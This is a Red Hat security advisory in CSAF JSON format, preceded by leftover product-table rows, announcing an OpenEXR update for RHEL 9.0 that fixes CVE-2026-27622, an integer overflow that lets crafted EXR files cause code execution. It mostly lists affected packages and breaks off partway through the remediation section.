| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for openexr is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.\n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8870",
"url": "https://access.redhat.com/errata/RHSA-2026:8870"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8870.json"
}
],
"title": "Red Hat Security Advisory: openexr security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:31+00:00",
"generator": {
"date": "2026-05-14T22:36:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:8870",
"initial_release_date": "2026-04-20T03:19:54+00:00",
"revision_history": [
{
"date": "2026-04-20T03:19:54+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-20T03:19:54+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product": {
"name": "Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_e4s:9.0::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_0.2.src",
"product": {
"name": "openexr-0:3.1.1-2.el9_0.2.src",
"product_id": "openexr-0:3.1.1-2.el9_0.2.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_0.2?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_0.2.aarch64",
"product": {
"name": "openexr-0:3.1.1-2.el9_0.2.aarch64",
"product_id": "openexr-0:3.1.1-2.el9_0.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_0.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"product_id": "openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_0.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_0.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_0.2?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_0.2?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_0.2.ppc64le",
"product": {
"name": "openexr-0:3.1.1-2.el9_0.2.ppc64le",
"product_id": "openexr-0:3.1.1-2.el9_0.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_0.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"product_id": "openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_0.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_0.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_0.2?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_0.2?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_0.2.x86_64",
"product": {
"name": "openexr-0:3.1.1-2.el9_0.2.x86_64",
"product_id": "openexr-0:3.1.1-2.el9_0.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_0.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"product_id": "openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_0.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_0.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_0.2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_0.2?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_0.2.i686",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.i686",
"product_id": "openexr-libs-0:3.1.1-2.el9_0.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_0.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_0.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_0.2?arch=i686"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_0.2?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-0:3.1.1-2.el9_0.2.s390x",
"product": {
"name": "openexr-0:3.1.1-2.el9_0.2.s390x",
"product_id": "openexr-0:3.1.1-2.el9_0.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr@3.1.1-2.el9_0.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"product": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"product_id": "openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs@3.1.1-2.el9_0.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"product": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"product_id": "openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.1-2.el9_0.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"product_id": "openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.1-2.el9_0.2?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"product_id": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.1-2.el9_0.2?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_0.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.aarch64"
},
"product_reference": "openexr-0:3.1.1-2.el9_0.2.aarch64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_0.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.ppc64le"
},
"product_reference": "openexr-0:3.1.1-2.el9_0.2.ppc64le",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_0.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.s390x"
},
"product_reference": "openexr-0:3.1.1-2.el9_0.2.s390x",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_0.2.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.src"
},
"product_reference": "openexr-0:3.1.1-2.el9_0.2.src",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-2.el9_0.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.x86_64"
},
"product_reference": "openexr-0:3.1.1-2.el9_0.2.x86_64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.i686"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_0.2.i686",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_0.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"product_id": "AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"relates_to_product_reference": "AppStream-9.0.0.Z.E4S"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.src",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T03:19:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.s390x",
